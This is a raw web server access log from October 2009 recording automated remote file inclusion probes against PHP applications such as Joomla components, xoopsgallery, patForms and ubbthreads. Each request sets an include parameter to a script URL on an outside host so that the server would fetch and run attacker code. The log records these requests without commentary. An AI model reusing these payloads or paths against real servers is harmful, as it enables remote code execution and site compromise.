174.143.3.188 - - [06/Oct/2009:02:55:52 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
174.143.3.188 - - [06/Oct/2009:02:55:52 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
174.143.3.188 - - [06/Oct/2009:02:55:52 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Advanced Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [06/Oct/2009:02:55:52 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
83.138.48.14 - - [06/Oct/2009:02:55:54 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:54 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:54 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:54 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:02:56:02 -0400] "GET /logs/access_log.Q109062300%20%20//cyber.php?act=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:02:55:42 -0400] "GET /logs/access_log.Q109051600 HTTP/1.0" 200 2853952 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.162.74.91 - - [06/Oct/2009:02:57:19 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:19 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:19 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:19 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:21 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:21 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:21 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:22 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:22 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:22 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:24 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:57:25 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
81.12.13.152 - - [06/Oct/2009:02:58:04 -0400] "GET /logs/access_log.Q109091600/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
81.12.13.152 - - [06/Oct/2009:02:58:04 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
81.12.13.152 - - [06/Oct/2009:02:58:04 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
81.12.13.152 - - [06/Oct/2009:02:58:25 -0400] "GET /logs/error_log.Q109072900/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:58:29 -0400] "GET /logs/access_log.Q109070800//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:58:29 -0400] "GET /logs/access_log.Q109080400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:02:58:53 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:02:58:53 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:02:58:53 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:02:58:56 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:59:25 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:59:25 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:59:25 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:59:25 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:59:25 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:59:25 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:59:25 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:59:25 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:00:15 -0400] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:00:15 -0400] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:00:15 -0400] "GET /logs/access_log.Q109081100//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:00:23 -0400] "GET /logs/access_log.Q109081100%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:00:23 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:00:23 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:00:23 -0400] "GET /logs/access_log.Q109081500%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:00:24 -0400] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:00:24 -0400] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:00:24 -0400] "GET /logs/access_log.Q109081100//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:00:26 -0400] "GET /logs/access_log.Q109092200%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:00:28 -0400] "GET /logs/access_log.Q109081100%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:00:32 -0400] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:00:32 -0400] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:00:32 -0400] "GET /logs/access_log.Q109081100//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:00:34 -0400] "GET /logs//ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:00:34 -0400] "GET /logs/access_log.Q109090900%20%20//ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:00:34 -0400] "GET //ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:00:34 -0400] "GET /logs/access_log.Q109081100%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:00:34 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:00:34 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:00:34 -0400] "GET /logs/access_log.Q109081500%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:00:34 -0400] "GET /logs/access_log.Q109082800%20%20//ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.149.32.24 - - [06/Oct/2009:03:00:34 -0400] "GET /logs/access_log.Q109092200%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:03:01:06 -0400] "GET ////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 200 470 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:03:01:06 -0400] "GET /logs/access_log.Q109072900////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:03:01:06 -0400] "GET /logs////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 200 20737 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:03:01:13 -0400] "GET /logs/access_log.Q109072900////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:03:01:13 -0400] "GET ////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 200 470 "-" "libwww-perl/5.805"
218.55.227.178 - - [06/Oct/2009:03:01:13 -0400] "GET /logs////////////////////?_SERVER[DOCUMENT_ROOT]=http://www.gizzang.co.kr/bbs//data/rfi.txt?%0D?? HTTP/1.1" 200 20737 "-" "libwww-perl/5.805"
64.150.183.219 - - [06/Oct/2009:03:01:47 -0400] "GET /logs/access_log.Q109081200%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:01:47 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:01:47 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:01:50 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:01:50 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.150.183.219 - - [06/Oct/2009:03:01:50 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:01:53 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:01:54 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:01:54 -0400] "GET /logs/access_log.Q109081200%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:01:55 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:01:55 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.239.69.157 - - [06/Oct/2009:03:01:56 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:02:05 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:02:05 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:02:05 -0400] "GET /logs/access_log.Q109081200%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:02:05 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:02:05 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:03:02:05 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:02:08 -0400] "GET //include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:02:08 -0400] "GET /logs//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:02:08 -0400] "GET /logs/error_log.Q109051100%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:02:13 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:02:13 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:02:13 -0400] "GET /logs/access_log.Q109081200%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:02:14 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:02:14 -0400] "GET /logs/access_log.Q109090900%20%20//ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:02:14 -0400] "GET /logs//ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:02:14 -0400] "GET //ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:02:15 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:02:16 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:02:17 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:02:17 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:02:17 -0400] "GET //ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:02:17 -0400] "GET /logs//ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:02:17 -0400] "GET /logs/access_log.Q109090900%20%20//ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:02:17 -0400] "GET /logs/access_log.Q109082800%20%20//ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:02:19 -0400] "GET /logs/access_log.Q109082800%20%20//ubbthreads/ubbt.inc.php?thispath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:03:02:20 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
